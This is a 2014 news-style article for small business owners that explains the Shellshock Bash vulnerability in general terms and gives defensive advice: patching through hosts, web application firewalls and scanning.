Just a few months ago, the Web was buzzing about the Heartbleed vulnerability. Now there’s a new security vulnerability in town — and its name is Shellshock.
“Bash Shell Shock,” as it is also known, was discovered and reported by French security researcher Stephane Chazelas earlier this month. The source of the vulnerability had been out there for over two decades, but was not discovered until recently.
The Shellshock bug had to be quietly yet publicly disclosed so that software and other companies could patch it. However, as these things typically go, hackers immediately piled on to see how far they could exploit it. As of Thursday, September 25, 2014, hackers started attacking websites to see if they were vulnerable.
Here are some questions and answers for small business owners about how Shellshock may or may not affect your business:
Who or what does Shellshock affect?
Shellshock is primarily of concern to Web-connected Linux or UNIX computers. It is a vulnerability present in many computer servers that are connected to the Internet — servers that host websites, email, cloud software applications or networks.
The ultimate scope of the Shellshock bug is hard to fully map out. That’s because the world wide Web is so interconnected. Yes, hackers may be targeting vulnerable Web servers. But it doesn’t stop there.
If a website or network is “infected” as a result of Shellshock, that’s of course bad news for the website or network. But even for visitors to an infected website, it could still have repercussions down the line. That’s because individual computers and devices could get infected as a result of visiting infected sites. Presumably, though, a good anitvirus/Internet security software should protect most individual computer users.
For most small businesses, though, the main concern is how to protect your website and/or network from Shellshock.
How do websites get exposed to Shellshock?
The primary exposure is to Linux and UNIX computers that use a type of software called Bash. According to Incapsula, a Web security service:
“Much of the risk associated with Shellshock is derived from the fact that Bash is widely used by many Linux and UNIX servers. The vulnerability potentially allows unauthenticated attackers to remotely execute code on these machines, which enables data theft, malware injection and server hijacking.
As dangerous as this sounds, Shellshock can be contained.”
Security service Sucuri adds, however, that you shouldn’t be complacent just because your website is not on a Linux or UNIX based server.
Shellshock may affect Web servers that use certain functions within cPanel. cPanel is a popular back-end dashboard that many small business websites use to manage their servers and websites. The good news, if you can call it that, is that Shellshock does not affect every website using cPanel. It affects only those that use something called mod_cgi (but apparently mod_cgi may be present even if you’re not aware of it). See technical details at the Sucuri blog.
What happens to a Web server that is compromised?
If hackers get into a vulnerable server through exploiting the Shellshock bug, they can wreak the garden variety kind of havoc they usually do:
- steal data,
- infect websites with malware,
- shut down networks, and
- harness machines into armies of botnets to launch attacks on other sites or computers.
What’s being done about Shellshock?
Luckily, large software providers, Web hosting companies, firewall providers and online security services are on it. They are issuing software patches, scanning for vulnerabilities and/or hardening their systems.
Amazon and Google both raced to respond to the Shellshock bug, according to the Wall Street Journal:
“Google has taken steps to fix the bug in both its internal servers and commercial cloud services, a person familiar with the matter said. Amazon released a bulletin Thursday that showed Amazon Web Services customers how to mitigate the problem.”
Amazon Web Services issued a blog post on the topic, for its customers that use its Web Services division such as for hosting their sites or running applications. Amazon is applying patches and will reboot about 10% of its servers over the coming week, leading to a “few minutes” of interruption. The full Amazon post is here. [Note: this doesn’t affect the Amazon consumer ecommerce site that millions shop on. It relates only to companies that use Amazon Web Services.]
How do I protect my company’s website?
Practically speaking, you’re more likely to have a website at risk if you self-host with your own server(s) at your premises or are responsible for managing your own hosting or network server(s). That’s because your in-house team has primary responsibility in those circumstances for checking and patching server software.
If you’re not sure about your hosting situation, start by checking with your technical team. Ask how they are addressing the issue.
If you are a do-it-yourselfer or don’t have technical support available to help you, here are three ways to check your website and/or protect it:
1. If you use an outside hosting company, check with your host to see how they are handling Shellshock.
Most large and professional hosting companies have put, or are in the process of putting, patches in place for affected servers.
By now, they may even have posted something on their blogs, Twitter feeds or support forums. For example, here is BlueHost’s update about Shellshock.
2. Another way to protect your website is to use a Web application firewall / security service (“WAF”) with your website.
These services act as a wall to keep out hackers, bad bots and other malicious traffic from your site. But they let in traffic that doesn’t appear to pose a threat.
To the human being who is a visitor or end-user, a Web firewall is invisible. But it protects your website from many vulnerabilities and attacks. (And you might be shocked to learn just how much activity hitting your site is bot traffic — you may not know until you put a firewall in place that tracks it.)
Today, these Web firewall services are affordable and pretty easy to implement. Prices start at $10 per month on the low end. On the high end, they go from several hundred dollars on up, for large and popular sites and platforms. But they are worth it for the peace of mind. Most are cloud-based services, meaning there’s no hardware to install. You purchase online, adjust some settings, and your site is protected. Many give you analytics to show you the volume of bad activity being kept out of your site.
Some Web firewall services include Incapsula, Cloudflare, Barracuda and Sucuri Firewall. However, make sure that if you are using a security provider, it’s their firewall service that you are using. Many CDNs and security services offer different products or levels of service. Not all are Web firewalls or WAF firewalls.
And not all WAF firewalls are created equal. Some do a better job than others. So read reviews and do your research when choosing.
3. Test your domain for vulnerability.
This scanner can help: https://shellshock.detectify.com/
What about visiting websites — can I or my staff be infected just by surfing online?
Individual users — including your employees — will need to be concerned with protecting against the residual effects of a compromised website, Web application or network.
For example, let’s say a website ends up being infected with malware as a result of Shellshock. In that situation, visitors to the infected website could be at risk from malware such as viruses. In other words, even if your computer is not directly vulnerable to Shellshock, you could still “catch a virus” from a compromised website.
It goes without saying — a key thing is to be sure you’ve installed and regularly update antivirus/Internet security software on individual computers.
More Shellshock Resources
Check out this YouTube video explaining Shellshock. It’s a good explanation in about 4 minutes:
Hacker image via Shutterstock